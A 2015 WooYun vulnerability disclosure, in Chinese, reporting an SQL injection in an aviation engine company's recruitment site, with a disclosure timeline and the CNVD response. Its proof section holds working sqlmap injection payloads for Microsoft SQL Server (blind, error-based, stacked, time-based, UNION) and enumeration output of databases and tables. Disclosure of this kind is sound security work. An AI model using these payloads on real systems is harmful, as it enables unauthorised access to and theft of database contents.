漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0137219
漏洞标题:中航商用网站存在SQL注入一枚
相关厂商:中国航空工业集团
漏洞作者: 路人甲
提交时间:2015-08-29 09:24
修复时间:2015-10-15 17:48
公开时间:2015-10-15 17:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-29: 细节已通知厂商并且等待厂商处理中
2015-08-31: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开
简要描述:
中航商用航空发动机有限公司招聘网站存在SQL注入
详细说明:
中航商用航空发动机有限公司招聘网站存在SQL注入
最近打算从成飞离开去上海去商飞官网一看 手贱就发现有个注入点(虽然不是这个的)
注入点:http://**.**.**.**/News_model.asp?nid=22
get注入 丢sqlmap跑
漏洞证明:
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=23' AND 1590=1590 AND 'mgnA'='mgnA
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: nid=23' AND 4624=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4624=4624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'LKXG'='LKXG
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: nid=23';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: nid=23' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: nid=23' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(88)+CHAR(70)+CHAR(86)+CHAR(79)+CHAR(85)+CHAR(75)+CHAR(85)+CHAR(89)+CHAR(66)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[21:18:52] [INFO] testing Microsoft SQL Server
[21:18:53] [INFO] confirming Microsoft SQL Server
[21:18:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[INFO] fetching database names
[INFO] the SQL query used returns 8 entries
[INFO] retrieved: ACAEZPXTNEW
[INFO] retrieved: AVICZPXT
[INFO] retrieved: master
[INFO] retrieved: model
[INFO] retrieved: msdb
[INFO] retrieved: Northwind
[INFO] retrieved: pubs
[INFO] retrieved: tempdb
available databases [8]:
[*] ACAEZPXTNEW
[*] AVICZPXT
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
可获取整个数据库信息
其中一个
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
至于是否有敏感信息请自查,只查看了结构并未深入
修复方案:
waf,过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-08-31 17:47
厂商回复:
CNVD确认并复现所述漏洞情况,已由CNVD通过网站管理单位公开的联系方式向其两个邮箱通报。
最新状态:
暂无